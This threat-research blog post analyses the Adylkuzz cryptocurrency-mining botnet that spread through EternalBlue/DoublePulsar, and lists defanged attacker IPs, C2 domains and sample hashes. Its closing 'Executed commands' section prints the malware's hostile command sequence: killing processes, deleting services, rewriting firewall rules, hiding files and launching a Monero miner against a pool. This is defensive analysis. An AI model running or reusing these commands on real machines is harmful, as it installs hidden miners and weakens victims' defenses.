Look anywhere in the news today and it’s hard to miss coverage about WannaCry, the SMB exploit-loving ransomware that wormed its way into all our hearts. This piece of malware certainly proved a few points about the current state of cyber security – namely that patch management, network segmentation, asset management and perimeter defense are all areas that need to be taken more seriously.

In addition, however, while attempting to capture new samples of WannaCry in the wild over the weekend, a surprising discovery was made by security researchers: a similar piece of malware was already on the loose and had been performing its nefarious duties in a much less intrusive manner. More surprisingly, it had been active since mid-April, weeks before the more recent WannaCry outbreak. This malware was part of a more traditional botnet intended to use its victims to mine cryptocurrency, and it may have unintentionally taken the edge off of what WannaCry otherwise could have done.

This malware is the Adylkuzz cryptocurrency mining botnet and it spread through the same one-two punch of EternalBlue/DoublePulsar that WannaCry utilized. Instead of encrypting a victim’s files and holding them for ransom this malware simply eats resources on a machine to mine Monero cryptocurrency.  The mining software uses spare processor cycles and memory to perform difficult computations. In addition to starting this mining process, the DoublePulsar payload delivered by the botnet also adds a firewall rule to block port 445 access, the SMB port that was used to infect the victim with this Adylkuzz botnet.

Since both the mining process and addition of a single firewall rule are relatively benign actions to a victim, the only real symptoms of infection would be a slightly sluggish workstation or server and potential loss of file shares. This minimal impact is probably what allowed the botnet to operate for weeks without detection. Additionally, its actions probably prevented the WannaCry epidemic from being as bad as it could have been since the victims of Adylkuzz could not be infected because the required port was no longer open.

More than 20 active exploitation hosts and more than a dozen C2 servers have been identified since discovery over the weekend, though there are probably additional exploitation/C2 servers remaining to be found.

As the dust begins to settle from this outbreak of infections a few questions remain:

  • What other malware has been utilizing these leaked exploits that may have gone unnoticed?
  • How will others change them to increase their usefulness?
  • What will organizations change to ensure that the next major release of exploits doesn’t result in a similar outcome?

Threat Research

Thanks to the analysis of Adylkuzz provided by Kaffeine and others we can provide information about the following IOCs:

 

Selection of Domain/IP Address Date Comment
45.32.52[.]8 2017-05-16 Attacking host
45.76.123[.]172 2017-05-16 Attacking host
104.238.185[.]251 2017-05-16 Attacking host
45.77.57[.]194 2017-05-14 Attacking host
45.76.39[.]29 2017-05-15 Attacking host
45.77.57[.]36 2017-05-15 Attacking host
104.238.150[.]145 2017-05-14 Server hosting the payload binary
08.super5566[.]com 2017-05-14 Adylkuzz C&C
a1.super5566[.]com 2017-05-02 Adylkuzz C&C
aa1.super5566[.]com 2017-05-01 Adylkuzz C&C
lll.super1024[.]com 2017-04-24 Adylkuzz C&C
07.super5566[.]com 2017-04-30 Adylkuzz C&C
am.super1024[.]com 2017-04-25 Adylkuzz C&C
05.microsoftcloudserver[.]com 2017-05-12 Adylkuzz C&C
d.disgogoweb[.]com 2017-04-30 Adylkuzz C&C
panel.minecoins18[.]com 2014-10-17 Adylkuzz C&C in 2014
wa.ssr[.]la 2017-04-28 Adylkuzz C&C
45.77.57[.]190 2017-05-15 Host presenting same signature as attackers
45.77.58[.]10 2017-05-15 Host presenting same signature as attackers
45.77.58[.]40 2017-05-15 Host presenting same signature as attackers
45.77.58[.]70 2017-05-15 Host presenting same signature as attackers
45.77.56[.]87 2017-05-15 Host presenting same signature as attackers
45.77.21[.]159 2017-05-15 Attacking Host
45.77.29[.]51 2017-05-15 Host presenting same signature as attackers
45.77.31[.]219 2017-05-15 Host presenting same signature as attackers
45.77.5[.]176 2017-05-15 Host presenting same signature as attackers
45.77.23[.]225 2017-05-15 Host presenting same signature as attackers
45.77.58[.]147 2017-05-15 Host presenting same signature as attackers
45.77.56[.]114 2017-05-15 Host presenting same signature as attackers
45.77.3[.]179 2017-05-15 Host presenting same signature as attackers
45.77.58[.]134 2017-05-15 Host presenting same signature as attackers
45.77.59[.]27 2017-05-15 Host presenting same signature as attackers

 

Select Dropped Samples

SHA-256 Date Comment
8200755cbedd6f15eecd8207eba534709a01957b172d7a051b9cc4769ddbf233 2017-05-14 Adylkuzz.B spread via EB/DP
450cb5593d2431d00455cabfecc4d28d42585789d84c25d25cdc5505189b4f9f 2017-04-24 Adylkuzz.A (we are not sure that instance was spread via EB/DP)
a7000b2618512f1cb24b51f4ae2f34d332b746183dfad6483aba04571ba8b2f9 2017-05-14 s2bk.1_.exe
e96681456d793368a6fccfa1321c10c593f3527d7cadb1ff462aa0359af61dee 2017-05-14 445.bat (? seems to cleanup old variant of the coin miner and stop windows Update)
e6680bf0d3b32583047e9304d1703c87878c7c82910fbe05efc8519d2ca2df71 2017-05-14 Msiexev.exe
Bitcoin miner process
55622d4a582ceed0d54b12eb40222bca9650cc67b39f74c5f4b78320a036af88 2017-05-02 Bitcoin miner process
6f74f7c01503913553b0a6118b0ea198c5a419be86fca4aaae275663806f68f3 2017-05-15 Adylkuzz.B spread via EB/DP

Executed commands:

taskkill /f /im hdmanager.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
taskkill /f /im mmc.exe
sc stop WELM
sc delete WELM
netsh ipsec static add policy name=netbc
netsh ipsec static add filterlist name=block
netsh ipsec static add filteraction name=block action=block
netsh ipsec static add filter filterlist=block any srcmask=32 srcport=0 dstaddr=me dstport=445
protocol=tcp description=445
netsh ipsec static add rule name=block policy=netbc filterlist=block filteraction=block
netsh ipsec static set policy name=netbc assign=y
C:\Windows\Fonts\wuauser.exe –server
C:\Windows\Fonts\msiexev.exe -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:443 -u
49v1V2suGMS8JyPEU5FTtJRTHQ9YmraW7Mf2btVCTxZuEB8EjjqQz3i8vECu7XCgvUfiW6
NtSRewnHF5MNA3LbQTBQV3v9i -p x -t 1
C:\Windows\TEMP\\s2bk.1_.exe /stab C:\Windows\TEMP\\s2bk.2_.log
taskkill /f /im msiexev.exe
netsh advfirewall firewall delete rule name=”Chrome”
netsh advfirewall firewall delete rule name=”Windriver”
netsh advfirewall firewall add rule name=”Chrome” dir=in program=”C:\Program
Files\Google\Chrome\Application\chrome.txt” action=allow
netsh advfirewall firewall add rule name=”Windriver” dir=in program=”C:\Program
Files\Hardware Driver Management\windriver.exe” action=allow
C:\Windows\445.bat
C:\Windows\system32\PING.EXE ping 127.0.0.1
net stop Windows32_Update
attrib +s +a +r +h wuauser.exe
C:\Windows\system32\SecEdit.exe secedit /configure /db C:\Windows\netbios.sdb
C:\Windows\system32\net1 stop Windows32_Update

Source:
https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-
for-weeks-via-eternalblue-doublepulsar